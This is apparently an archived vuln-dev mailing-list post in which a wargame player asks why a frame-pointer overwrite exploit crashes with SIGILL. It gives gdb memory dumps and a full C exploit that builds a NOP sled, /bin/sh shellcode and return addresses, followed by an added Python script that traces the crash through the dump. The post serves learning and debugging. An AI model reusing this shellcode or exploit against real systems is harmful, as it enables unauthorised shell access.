Illegal Instruction and Frame pointer overwriting

From: joe (moj0e_at_terra.com.br)
Date: 09/24/03

  • Next message: Bob Askew: "Win32: Using SEH to search memory"

    Date: Wed, 24 Sep 2003 09:19:14 -0300
    To: vuln-dev@securityfocus.com

    Hello! It is great to have such a mailing list as this! It's not too hot and
    not too cold!! It's just right!!
    Anyway...
    I am having a problem developing an exploit for a wargame.
    The vuln is just like the one on:

    http://www.phrack.org/phrack/55/P55-08

    I even use the exploit provided since the vuln is almost identical
    to the one on the wargame.
    I am able to overwrite the last byte on EBP (I realize it adds 4 to it)
    and make it point to an address that will take me to the NOPs.
    From there it travels up the memory until it hits a certain address
    and causes an ILLEGAL INSTRUCTION (at least it doesn't segfault).

    It tries to execute instruction 0xf798bfff, which doesn't look right to me.

    (I am using Mandrake 9.1 on an x86.) The vuln was compiled with gcc v2.9
    or something... the one that makes it possible to exploit this kind of
    vuln. I am able to check execution flow by examining the memory (using
    the x command in gdb).
    So I know that I am actually going to where I want (or think I want) to go.

    Any help is gratefully accepted! Attached is the exploit.

    Here is some gdb output for you to chew on:

    (no debugging symbols found)...
    (gdb) run `./xp15`
    Breakpoint 1, 0x08048555 in main ()
    (gdb) info reg esp
    esp 0xbffff78c 0xbffff78c
    (gdb) x 0xbffff78c
    0xbffff78c: 0xbffff710
    (gdb) x 0xbffff710
    0xbffff710: 0x90909090
    (gdb) c
    Continuing.

    Program received signal SIGILL, Illegal instruction.
    0xbffff776 in ?? ()
    (gdb) x 0xbffff776
    0xbffff776: 0xf798bfff
    (gdb) x/100 0xbffff700
    0xbffff700: 0x90909090 0x90909090 0x90909090 0x90909090
    0xbffff710: 0x90909090 0x90909090 0x90909090 0x90909090
    0xbffff720: 0x90909090 0x90909090 0x90909090 0x90909090
    0xbffff730: 0x90909090 0x90909090 0x90909090 0x90909090
    0xbffff740: 0x90909090 0x90909090 0x90909090 0x24eb9090
    0xbffff750: 0x891e8d5e 0xd2330b5e 0x89075689 0x1bb80f56
    0xbffff760: 0x35123456 0x12345610 0x4006d57d 0x40155f50
    0xbffff770: 0x40012780 0xbffff804 0xbffff798 0x40077eb2
    0xbffff780: 0x40154360 0x08048660 0xbffff7a4 0xbffff710
    0xbffff790: 0x88888888 0x40155f50 0xbffff788 0x08048551
    0xbffff7a0: 0x08048660 0xbffff804 0xbffff7b8 0x400508d9
    0xbffff7b0: 0x40031038 0x40155f50 0xbffff7d8 0x4003b7f7
    0xbffff7c0: 0x00000002 0xbffff804 0xbffff810 0x40012c10
    0xbffff7d0: 0x00000002 0x08048380 0x00000000 0x080483a1
    0xbffff7e0: 0x080484b0 0x00000002 0xbffff804 0x080482e0
    0xbffff7f0: 0x08048590 0x4000abf0 0xbffff7fc 0x40012de0
    0xbffff800: 0x00000002 0xbffff947 0xbffff961 0x00000000
    0xbffff810: 0xbffffa63 0xbffffa76 0xbffffa85 0xbffffa96
    0xbffff820: 0xbffffaa8 0xbffffac0 0xbffffacb 0xbffffadb
    0xbffff830: 0xbffffae9 0xbffffb03 0xbffffb14 0xbffffb1d
    0xbffff840: 0xbffffcfb 0xbffffd0e 0xbffffd1c 0xbffffd3c
    0xbffff850: 0xbffffd67 0xbffffd80 0xbffffdfb 0xbffffe0d
    0xbffff860: 0xbffffe19 0xbffffe35 0xbffffe44 0xbffffe5c
    0xbffff870: 0xbffffe6d 0xbffffe82 0xbffffe9d 0xbffffed2
    0xbffff880: 0xbffffedd 0xbffffef2 0xbfffff09 0xbfffff11
    (gdb)
    (gdb)quit
    [blurb@wargame]$ fortune
    "The major difference between a thing that might go wrong
    and a thing that cannot possibly go wrong is that when a
    thing that cannot possibly go wrong goes wrong it usually
    turns out to be impossible to get at or repair."

    -- One of the laws of computers and programming revealed.
    [blurb@wargame]$

    
    

    #include <stdio.h>
    #include <strings.h>   /* bzero() */
    #include <unistd.h>

    char sc_linux[] =
    /* An earlier shellcode, left commented out by the author:
       "\x31\xdb"
       "\x89\xd8"
       "\xb0\x17"
       "\xcd\x80"
       "\x31\xdb"
       "\x89\xd8"
       "\xb0\x2e"
       "\xcd\x80"
       "\x31\xc0"
       "\x50"
       "\x68\x2f\x2f\x73\x68"
       "\x68\x2f\x62\x69\x6e"
       "\x89\xe3"
       "\x50"
       "\x53"
       "\x89\xe1"
       "\x31\xd2"
       "\xb0\x0b"
       "\xcd\x80"
       "\x31\xdb"
       "\x89\xd8"
       "\xb0\x01"
       "\xcd\x80"; */
    /* Original shellcode, the one actually used: starts with a short jump
       (eb 24) and ends with a call back over the "/bin/sh" string. */
            "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
            "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
            "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
            "\xd7\xff\xff\xff/bin/sh";

    int main(void)
    {
            int i, j, t;
            char buffer[1024];

            bzero(buffer, sizeof(buffer));

            /* NOP sled: 0x90 up to and including offset 252 - sizeof(sc_linux) - 20 */
            for (i = 0; i <= (int)(252 - sizeof(sc_linux) - 20); i++)
                    buffer[i] = 0x90;

            /* shellcode, without its terminating NUL */
            for (j = 0; j < (int)(sizeof(sc_linux) - 1); i++, j++)
                    buffer[i] = sc_linux[j];

            /* four copies of the address of our buffer, 0xbffff710, little-endian */
            for (t = 0; t < 4; t++) {
                    buffer[i++] = 0x10;
                    buffer[i++] = 0xf7;
                    buffer[i++] = 0xff;
                    buffer[i++] = 0xbf;
            }

            /* overflow filler bytes (overflowchar) */
            for (t = 0; t < 9; t++)
                    buffer[i++] = 0x88;

            printf("%s", buffer);
            /* execl("./15", "./15", buffer, NULL); */

            return 0;
    }
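An added example, written here for triage of the crash above and not code from the post or the wargame: gdb's `x/Nx` prints each 32-bit word as a number, so on x86 the bytes at an address are the little-endian reversal of what is shown. The script below turns the dump lines quoted in the post into a byte map, reports what sits at the SIGILL address, and measures how much of the post's `sc_linux` bytes are still contiguous at the point where the sled ends. The dump lines and shellcode bytes are copied from the post; the function names (`parse_dump`, `triage`, and the rest) are my own.

```python
import re

# Lines copied from the post's "x/100 0xbffff700" dump (not constructed);
# feeding the whole dump in works the same way.
GDB_DUMP = """\
0xbffff740: 0x90909090 0x90909090 0x90909090 0x24eb9090
0xbffff750: 0x891e8d5e 0xd2330b5e 0x89075689 0x1bb80f56
0xbffff760: 0x35123456 0x12345610 0x4006d57d 0x40155f50
0xbffff770: 0x40012780 0xbffff804 0xbffff798 0x40077eb2
0xbffff780: 0x40154360 0x08048660 0xbffff7a4 0xbffff710
"""

# The sc_linux bytes from the post's exploit.
SHELLCODE = (b"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
             b"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
             b"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
             b"\xd7\xff\xff\xff/bin/sh")

DUMP_LINE = re.compile(r"^(0x[0-9a-fA-F]+):((?:\s+0x[0-9a-fA-F]{8})+)\s*$")


def parse_dump(text):
    """Map every byte address in a gdb 'x/Nx' dump to its value.

    gdb prints each 32-bit word numerically, so the word 0x24eb9090 shown at
    0xbffff74c stands for the bytes 90 90 eb 24 at 0xbffff74c..0xbffff74f."""
    mem = {}
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if not m:
            continue
        addr = int(m.group(1), 16)
        for word in m.group(2).split():
            for b in int(word, 16).to_bytes(4, "little"):
                mem[addr] = b
                addr += 1
    return mem


def bytes_at(mem, addr, n):
    """The n bytes starting at addr, in memory order (KeyError if not dumped)."""
    return bytes(mem[addr + k] for k in range(n))


def find_all(mem, pattern):
    """Every address at which the whole pattern is present contiguously."""
    return [addr for addr in sorted(mem)
            if all(mem.get(addr + k) == pattern[k] for k in range(len(pattern)))]


def matching_prefix_len(mem, addr, pattern):
    """How many leading bytes of pattern are still intact at addr."""
    n = 0
    while n < len(pattern) and mem.get(addr + n) == pattern[n]:
        n += 1
    return n


def jmp_short_target(addr, disp):
    """Destination of a two-byte 'jmp short' (EB xx) located at addr."""
    if disp >= 0x80:          # the displacement is a signed 8-bit value
        disp -= 0x100
    return addr + 2 + disp


def triage(mem, fault_addr, shellcode):
    """Summarise what the dump says about a crash at fault_addr."""
    starts = find_all(mem, shellcode[:2])
    report = {"fault_bytes": bytes_at(mem, fault_addr, 4).hex(" "),
              "shellcode_starts": starts}
    if starts:
        start = starts[0]
        report["intact_bytes"] = matching_prefix_len(mem, start, shellcode)
        if shellcode[0] == 0xEB:
            report["jmp_target"] = jmp_short_target(start, shellcode[1])
    return report


MEM = parse_dump(GDB_DUMP)

if __name__ == "__main__":
    r = triage(MEM, 0xBFFFF776, SHELLCODE)
    print("bytes at fault address :", r["fault_bytes"])
    print("shellcode found at     :", [hex(a) for a in r["shellcode_starts"]])
    print("intact shellcode bytes :", r.get("intact_bytes"), "of", len(SHELLCODE))
    print("jmp short lands at     :", hex(r["jmp_target"]) if "jmp_target" in r else None)
```

Run against the excerpt, it reports that the four bytes at 0xbffff776 are `ff bf 98 f7` (gdb shows the same word as 0xf798bfff), that `eb 24` sits at 0xbffff74e, that only 26 of the 50 shellcode bytes are still contiguous there (from 0xbffff768 on the dump holds pointer-looking values such as 0x4006d57d instead), and that the short jump lands at 0xbffff774, inside that non-matching range. Whatever clobbered that part of the stack, the dump itself shows that the bytes the processor faulted on were stack data rather than the shellcode, which is the first thing to establish in any crash triage before reasoning about control flow.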

